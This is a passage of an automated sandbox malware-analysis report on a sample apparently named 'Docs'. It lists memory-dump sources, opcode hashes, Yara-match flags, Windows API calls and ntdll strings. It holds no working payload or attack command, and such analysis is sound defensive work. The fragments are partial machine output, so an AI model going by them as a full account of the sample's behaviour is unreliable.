                                                              • Opcode Fuzzy Hash: 00135608aeddd0e644ba03fb126dbf18e1d99d34911a14afdf7070f649e1e1d1
                                                              • Instruction Fuzzy Hash: 7A2148B1508204DFDB04EF04EDC0B16BF65FB94324F34C569DA0A5B246C336E856C6A1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d621eba620d75bda4019881b612c5ccfca20402f5056fd72e6fcb5818f14d50
                                                              • Instruction ID: 8d69acc3579ce0cd58e8bff738fbc9cf1ada641b62920787ddddf9de49d6f9d0
                                                              • Opcode Fuzzy Hash: 8d621eba620d75bda4019881b612c5ccfca20402f5056fd72e6fcb5818f14d50
                                                              • Instruction Fuzzy Hash: 242126B1508204EFDB05DF54EDC8B26BFA5FB84318F34C5ADE8495B2A2C736D816CA61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 6a58889a1a9ecda57ce8a354db642a73a6701719ccc0205e42970fca3acc86be
                                                              • Instruction ID: a5d61e912a7e3eb4e5f672f4400a463ee6c7a0f447157c6d56cd3210196e2e65
                                                              • Opcode Fuzzy Hash: 6a58889a1a9ecda57ce8a354db642a73a6701719ccc0205e42970fca3acc86be
                                                              • Instruction Fuzzy Hash: 5F21D3B1508240DFDB18DF14E9C8B16BFA6EB84718F24C569D84A5B296C336D807CA61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0c0727156b658684e8c03e300b1b1e531d2947a2f253f6351439af52dcde984c
                                                              • Instruction ID: 964c406fc99fc3d14d11975c31e401f6fd1db5e9db8572c5eba7607eada12606
                                                              • Opcode Fuzzy Hash: 0c0727156b658684e8c03e300b1b1e531d2947a2f253f6351439af52dcde984c
                                                              • Instruction Fuzzy Hash: 5121807550D3808FCB06CF24D994715BF72EB46314F28C5EAD8498F6A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction ID: 7be6b237a32620c224286fb16728e817a685e85f95bb4362971ccc31e8f133b2
                                                              • Opcode Fuzzy Hash: c71a23e6f2891b0ac880f649e89db06405e67f0af756f6891ce480dd6b8289f7
                                                              • Instruction Fuzzy Hash: 2B112672408280CFDB12DF00E9C4B16BF71FB94324F24C2A9D9094B656C33AE85ACBA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060927889.0000000000E3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E3D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e3d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction ID: dec0019366d9474f3efd798400953180af14cca72e7d6f9a3ac77159b694d92d
                                                              • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                                                              • Instruction Fuzzy Hash: 1F11BE75508240DFCB02CF50D9C4B16BF61FB84318F24C6A9D8494B666C33AD81ACB51
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3194ac73d4e4115061341e8fc7b50b02a1c5ddca8a40e5574eb2fc1f09cd87b6
                                                              • Instruction ID: 61c4b9a503f924c92bd767041156f428ecc919f28d1b842b2f404372222756be
                                                              • Opcode Fuzzy Hash: 3194ac73d4e4115061341e8fc7b50b02a1c5ddca8a40e5574eb2fc1f09cd87b6
                                                              • Instruction Fuzzy Hash: AE012B7100C3509AE7104F19EDC4BA7BF98DF45324F28D51BEE095A286D33D9845CAB1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2060863832.0000000000E2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E2D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e2d000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: TJuq$Tepq$xbsq
                                                              • API String ID: 0-3289896765
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2064977617.0000000007230000.00000040.00000800.00020000.00000000.sdmp, Offset: 07230000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7230000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'pq
                                                              • API String ID: 0-1798494419
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2061117967.0000000000E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E80000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e80000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:137
                                                              Total number of Limit Nodes:11

                                                              Control-flow Graph

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0

                                                              Control-flow Graph

                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:

                                                              Control-flow Graph

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0

                                                              Control-flow Graph

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0

                                                              Control-flow Graph
                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0

                                                              Control-flow Graph
                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596195301.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_400000_Docs.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0

                                                              Control-flow Graph
                                                              control_flow_graph 424 15e2c0a-15e2c0f 425 15e2c1f-15e2c26 LdrInitializeThunk 424->425 426 15e2c11-15e2c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-2160512332
                                                              Strings
                                                              • 8, xrefs: 016152E3
                                                              • Invalid debug info address of this critical section, xrefs: 016154B6
                                                              • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154E2
                                                              • Address of the debug info found in the active list., xrefs: 016154AE, 016154FA
                                                              • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0161540A, 01615496, 01615519
                                                              • Thread identifier, xrefs: 0161553A
                                                              • Thread is in a state in which it cannot own a critical section, xrefs: 01615543
                                                              • Critical section address., xrefs: 01615502
                                                              • Critical section address, xrefs: 01615425, 016154BC, 01615534
                                                              • corrupted critical section, xrefs: 016154C2
                                                              • Critical section debug info address, xrefs: 0161541F, 0161552E
                                                              • undeleted critical section in freed memory, xrefs: 0161542B
                                                              • double initialized or corrupted critical section, xrefs: 01615508
                                                              • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 016154CE
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                              • API String ID: 0-2368682639
                                                              Strings
                                                              • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 016122E4
                                                              • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01612498
                                                              • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 016124C0
                                                              • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01612412
                                                              • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 016125EB
                                                              • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01612506
                                                              • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01612624
                                                              • @, xrefs: 0161259B
                                                              • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01612602
                                                              • RtlpResolveAssemblyStorageMapEntry, xrefs: 0161261F
                                                              • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01612409
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                              • API String ID: 0-4009184096
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                              • API String ID: 0-2515994595
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                              • API String ID: 0-1700792311
                                                              Strings
                                                              • VerifierFlags, xrefs: 01628C50
                                                              • VerifierDebug, xrefs: 01628CA5
                                                              • HandleTraces, xrefs: 01628C8F
                                                              • VerifierDlls, xrefs: 01628CBD
                                                              • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01628A67
                                                              • AVRF: -*- final list of providers -*- , xrefs: 01628B8F
                                                              • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01628A3D
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                              • API String ID: 0-3223716464
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                              • API String ID: 0-1109411897
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-792281065
                                                              Strings
                                                              • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 015F9A2A
                                                              • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 015F99ED
                                                              • Getting the shim engine exports failed with status 0x%08lx, xrefs: 015F9A01
                                                              • LdrpInitShimEngine, xrefs: 015F99F4, 015F9A07, 015F9A30
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015F9A11, 015F9A3A
                                                              • apphelp.dll, xrefs: 01596496
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                              • API String ID: 0-204845295
                                                              Strings
                                                              • RtlGetAssemblyStorageRoot, xrefs: 01612160, 0161219A, 016121BA
                                                              • SXS: %s() passed the empty activation context, xrefs: 01612165
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01612178
                                                              • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0161219F
                                                              • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 016121BF
                                                              • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01612180
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                              • API String ID: 0-861424205
                                                              Strings
                                                              • LdrpInitializeProcess, xrefs: 015DC6C4
                                                              • Loading import redirection DLL: '%wZ', xrefs: 01618170
                                                              • LdrpInitializeImportRedirection, xrefs: 01618177, 016181EB
                                                              • Unable to build import redirection Table, Status = 0x%x, xrefs: 016181E5
                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 01618181, 016181F5
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015DC6C3
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                              • API String ID: 0-475462383
                                                              • Opcode ID: bd777a779e1236b6779731eacd62f2fbd456d75ccf0245ec6dc2c3bf982a731c
                                                              • Instruction ID: 4d2b8de06c89927004de29cc32d6d61a9f9958929a358fc6f6274c248ac02b3e
                                                              • Opcode Fuzzy Hash: bd777a779e1236b6779731eacd62f2fbd456d75ccf0245ec6dc2c3bf982a731c
                                                              • Instruction Fuzzy Hash: 1031CE726447529FC224EF6CDD86E2A7BE9BB94A20F04055CF945AF391E660EC04C7A2
                                                              APIs
                                                                • Part of subcall function 015E2DF0: LdrInitializeThunk.NTDLL ref: 015E2DFA
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BA3
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0BB6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D60
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 015E0D74
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                              • String ID:
                                                              • API String ID: 1404860816-0
                                                              • Opcode ID: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                              • Instruction ID: 3d536ab001ed9443aeb783f88d6b6cf37ffd75c2e57e9dc2e5ed4b96e5e8374d
                                                              • Opcode Fuzzy Hash: fb64568e1866b5cd3d2ae65221675fb209b5b938173a5d378c94b8b9d6a3414d
                                                              • Instruction Fuzzy Hash: B9427B71A00716DFDB25CF28C894BAAB7F5FF44304F0485A9E989EB245D770AA85CF60
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2596611409.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_1570000_Docs.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                              • API String ID: 0-379654539
                                                              • Opcode ID: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                              • Instruction ID: 79865e975e0248c7da5083373ddda810ca3b69e3f3732b466848dad2097ae0b3
                                                              • Opcode Fuzzy Hash: 36fe068063a2b9555505e2fa2149f07b27844c952971311730bb2663e0d66727
                                                              • Instruction Fuzzy Hash: F8C19A705483828FDB26CF58C444B6EBBE4BF88704F44886EF9958B391E734C949CB56
                                                              Strings
                                                              • @, xrefs: 015D8591
                                                              • LdrpInitializeProcess, xrefs: 015D8422
                                                              • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 015D855E
                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015D8421
                                                              Memory Dump Source
